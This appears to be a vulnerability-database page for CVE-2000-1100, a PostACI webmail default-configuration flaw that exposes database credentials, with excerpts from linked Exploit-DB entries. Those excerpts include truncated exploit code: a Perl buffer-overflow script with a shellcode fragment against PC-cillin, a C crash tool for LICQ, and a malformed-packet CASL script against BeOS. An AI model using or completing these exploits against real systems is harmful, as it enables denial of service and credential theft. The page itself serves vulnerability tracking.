CVE-2000-1100
Published 2001-01-09
Priority P432 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 5.71% (92.1th percentile)
The default configuration for PostACI webmail system installs the /includes/global.inc configuration file within the web root, which allows remote attackers to read sensitive information such as database usernames and passwords via a direct HTTP GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trlinux | postaci_webmail | — | — |
No detection rules found.
Exploit-DB
Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
exploitdb·2002-12-10
CVE-2002-1349 Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
---
source: https://www.securityfocus.com/bid/6350/info
A buffer overflow vulnerability has been reported for PC-cillin's mail scanning utility.
An attacker can exploit this vulnerability by connecting to a vulnerable pop3trap.exe service and sending an overly long string. This will result in the process crashing and allowing the attacker to gain control over the execution of the process.
```perl
#!/usr/bin/perl
#pc-cillin DOS..will add shellcode l8r..
use IO::Socket;
$buf = 1100;
$host = $ARGV[0];
$port = $ARGV[1];
#shellcode needs to be modded..
#return addr is in the shellcode; doesn't work? go figure..
$hellcode = "\xF0\x00\x00\x00\x58\x55\x89\xE5\x81\xEC\x2C\x00\x00\x00\x89\x45\xD4\xC7\x45\xFC".
"\x00\x00\xE7\x77\x8B
```
Exploit-DB
LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow
exploitdb·2000-12-26
CVE-2001-0440 LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2406/info
At least one version of LICQ is vulnerable to a remote buffer overflow. By sending many characters (12000-16000) to the port on which LICQ is listening, an attacker can cause excessive data to be copied onto the stack and overwrite critical parts of the stack frame such as the calling functions' return address. Since this data is supplied by the user it can alter the program's flow of execution.
```c
/*
 * Name: Licqkill.c
 * Author: Stan Bubrouski
 * Date: December 26, 2000
 * Description: Licq will crash when 16707 or more characters are sent to the port
 * Licq is listening on. Finding the port Licq is running on is pretty
 * simple because by default it starts using ports around 1100 or s
```
Exploit-DB
Trlinux Postaci Webmail 1.1.3 - Password Disclosure
exploitdb·2000-11-30
CVE-2000-1100 Trlinux Postaci Webmail 1.1.3 - Password Disclosure
---
source: https://www.securityfocus.com/bid/2029/info
Postaci Webmail is a database-driven web e-mail system. PostACI contains a vulnerability in its default configuration that may allow a remote attacker to gain access to the underlying database.
Webmail stores database username and password information in a file called global.inc. This file is world-readable and stored in a directory accessible by a web browser over the internet. As a result, an attacker can retrieve the global.inc file with a web browser on a typical system (default configuration). Once obtained, the attacker may be able to access the system's database.
Successful exploitation will lead to the attacker gaining unauthorized access to the database.
Depending on th
Exploit-DB
Be BeOS 4.0/4.5/5.0 - IP Packet Length Field
exploitdb·2000-04-07
CVE-2000-0279 Be BeOS 4.0/4.5/5.0 - IP Packet Length Field
---
source: https://www.securityfocus.com/bid/1100/info
The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28.
--------------becasl.casl--------------------
```
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet =
```
No writeups or analysis indexed.